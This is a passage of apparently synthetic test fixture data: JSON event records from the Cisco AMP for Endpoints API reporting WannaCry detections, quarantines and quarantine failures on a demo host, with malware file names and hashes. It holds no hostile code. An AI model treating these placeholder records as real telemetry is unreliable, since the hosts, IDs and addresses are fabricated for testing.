pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
